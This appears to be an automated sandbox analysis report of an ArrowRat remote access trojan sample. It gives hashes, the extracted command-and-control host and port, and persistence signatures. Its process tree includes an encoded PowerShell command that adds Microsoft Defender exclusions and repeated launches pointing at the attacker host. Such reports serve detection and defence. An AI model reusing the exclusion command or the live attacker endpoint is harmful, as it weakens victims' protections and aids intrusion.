Overview

overview

10

Static

static

3

2be002d8f4...eb.exe

windows7-x64

10

2be002d8f4...eb.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    31-07-2023 01:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe

  • Size

    2.4MB

  • MD5

    6eb284564aa7bd24f4f6df02ef05d185

  • SHA1

    47f85ddc0b1a090d1852c37b2e2e1449e5b6db88

  • SHA256

    2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb

  • SHA512

    49e1a9584c74f32f9566d3c4ca31684c474ec260e50bd07b8d3c0a8ef3f3e70d10773952e5d219aa8c9076b86cddcefd242dfb91b507feeb06c5d69ba9e91179

  • SSDEEP

    49152:Wm7ZuvKRXc8DJ2c2Xp95LBO1PJNNNQzgj7k/8E54IlDXRRtdQNH:D77P2XPOxJ9FcEq4IZXRRC

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

line-ellis.gl.at.ply.gg:10735

Mutex

nAChhjAnR

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe
    "C:\Users\Admin\AppData\Local\Temp\2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2344
    • C:\Windows\Client.exe
      "C:\Windows\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\system32\ctfmon.exe
          ctfmon.exe
          4⤵
            PID:2780
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
          3⤵
            PID:2820
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
            3⤵
              PID:2484
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
              3⤵
                PID:572
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
                3⤵
                  PID:1484
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
                  3⤵
                    PID:1108
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
                    3⤵
                      PID:1320
                    • C:\Windows\System32\ComputerDefaults.exe
                      "C:\Windows\System32\ComputerDefaults.exe"
                      3⤵
                        PID:1884
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
                        3⤵
                          PID:956
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
                          3⤵
                            PID:472
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
                            3⤵
                              PID:268
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
                              3⤵
                                PID:2756
                            • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
                              "C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1652

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
                            Filesize

                            2.2MB

                            MD5

                            70f3bc193dfa56b78f3e6e4f800f701f

                            SHA1

                            1e5598f2de49fed2e81f3dd8630c7346a2b89487

                            SHA256

                            3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                            SHA512

                            3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe
                            Filesize

                            2.2MB

                            MD5

                            70f3bc193dfa56b78f3e6e4f800f701f

                            SHA1

                            1e5598f2de49fed2e81f3dd8630c7346a2b89487

                            SHA256

                            3b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1

                            SHA512

                            3ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1

                            Download Submit

                          • C:\Windows\Client.exe
                            Filesize

                            158KB

                            MD5

                            d7dea9816b882cb53d615a3afdf0c955

                            SHA1

                            d3bfd91ff74c072028bd747d4f56f17cc55168a5

                            SHA256

                            96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                            SHA512

                            b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                            Download Submit

                          • C:\Windows\Client.exe
                            Filesize

                            158KB

                            MD5

                            d7dea9816b882cb53d615a3afdf0c955

                            SHA1

                            d3bfd91ff74c072028bd747d4f56f17cc55168a5

                            SHA256

                            96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

                            SHA512

                            b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

                            Download Submit

                          • \Users\Admin\AppData\Local\Temp\nsdAD03.tmp\System.dll
                            Filesize

                            11KB

                            MD5

                            a4dd044bcd94e9b3370ccf095b31f896

                            SHA1

                            17c78201323ab2095bc53184aa8267c9187d5173

                            SHA256

                            2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

                            SHA512

                            87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

                            Download Submit

                          • \Users\Admin\AppData\Local\Temp\nsdAD03.tmp\nsDialogs.dll
                            Filesize

                            9KB

                            MD5

                            0d45588070cf728359055f776af16ec4

                            SHA1

                            c4375ceb2883dee74632e81addbfa4e8b0c6d84a

                            SHA256

                            067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a

                            SHA512

                            751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415

                            Download Submit

                          • memory/1884-100-0x0000000001D00000-0x0000000001D01000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1884-105-0x0000000001D00000-0x0000000001D01000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2344-96-0x0000000002560000-0x00000000025E0000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/2344-95-0x0000000002560000-0x00000000025E0000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/2344-98-0x0000000002560000-0x00000000025E0000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/2344-97-0x0000000002560000-0x00000000025E0000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/2344-80-0x000000001B380000-0x000000001B662000-memory.dmp

                            Filesize

                            2.9MB

                            Download

                          • memory/2344-81-0x0000000002180000-0x0000000002188000-memory.dmp

                            Filesize

                            32KB

                            Download

                          • memory/2344-93-0x000007FEEF170000-0x000007FEEFB0D000-memory.dmp

                            Filesize

                            9.6MB

                            Download

                          • memory/2344-99-0x000007FEEF170000-0x000007FEEFB0D000-memory.dmp

                            Filesize

                            9.6MB

                            Download

                          • memory/2344-101-0x000007FEEF170000-0x000007FEEFB0D000-memory.dmp

                            Filesize

                            9.6MB

                            Download

                          • memory/2524-107-0x0000000003C60000-0x0000000003C61000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2524-104-0x0000000003C60000-0x0000000003C61000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2524-111-0x0000000003BB0000-0x0000000003BC0000-memory.dmp

                            Filesize

                            64KB

                            Download

                          • memory/2792-56-0x000000001B6F0000-0x000000001B770000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/2792-53-0x0000000001230000-0x0000000001490000-memory.dmp

                            Filesize

                            2.4MB

                            Download

                          • memory/2792-73-0x000007FEF5620000-0x000007FEF600C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2792-54-0x000007FEF5620000-0x000007FEF600C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2792-55-0x000007FEF5620000-0x000007FEF600C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2920-102-0x0000000002280000-0x0000000002300000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/2920-103-0x000007FEF5620000-0x000007FEF600C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2920-64-0x000007FEF5620000-0x000007FEF600C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2920-62-0x00000000001F0000-0x000000000021E000-memory.dmp

                            Filesize

                            184KB

                            Download

                          • memory/2920-106-0x0000000002280000-0x0000000002300000-memory.dmp

                            Filesize

                            512KB

                            Download